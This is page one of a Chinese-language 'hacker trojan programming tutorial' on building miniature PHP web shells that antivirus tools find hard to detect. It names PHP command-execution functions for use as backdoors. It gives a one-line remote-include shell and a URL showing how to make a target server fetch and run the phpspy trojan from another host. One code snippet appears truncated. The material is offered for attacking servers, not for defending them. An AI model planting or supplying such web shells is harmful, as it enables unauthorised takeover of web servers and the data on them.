[黑客木马编程教程]微型PHP木马解析


PHP语法的强大是ASP望尘莫及的,仅一个:就可以刺探整个服务器的配置。运行cmd,上传文件等,都是非常简便的,现在用的好的PHP木马,莫过于angel的phpspy了。昨天hak_ban问怎么给PHP木马加密,我还没想到,但是对于写一个微型PHP木马,我想还是很难被杀的。

这里简单探讨一下几个函数可以作为木马的使用:

1. 可以运行外部命令的几个函数:system,passthru,exec,shell_exec,popen。

例:只要将$cmd);?>等保存为cmd.php及可实现运行外部命令的功能。这几个函数可以说是最早的微行php木马了,所以一般虚拟主机的设置也会将这些函数屏蔽的。

2.还记得WDB论坛的style.php的漏洞吗?我们可以利用这个做个很难被杀的小木马。如下: 

<?php include($include);?>

将其保存为1.php,我们就可以调用其他不支持php服务器里的.php木马(如phpspy.php)来达到我们的目的:http://6688.cc/1.php? Include=http://www.6688.cc/phpspy.php

这里http://www.6688.cc是不支持php的,否则将会在http://www.6688.cc这台服务器运行phpspy.php,而不是目标服务器。

  • 1
  • 2
  • 下一页
【内容导航】
第1页:[黑客木马编程教程]微型PHP木马解析 第2页:[黑客木马编程教程]微型PHP木马解析

相关内容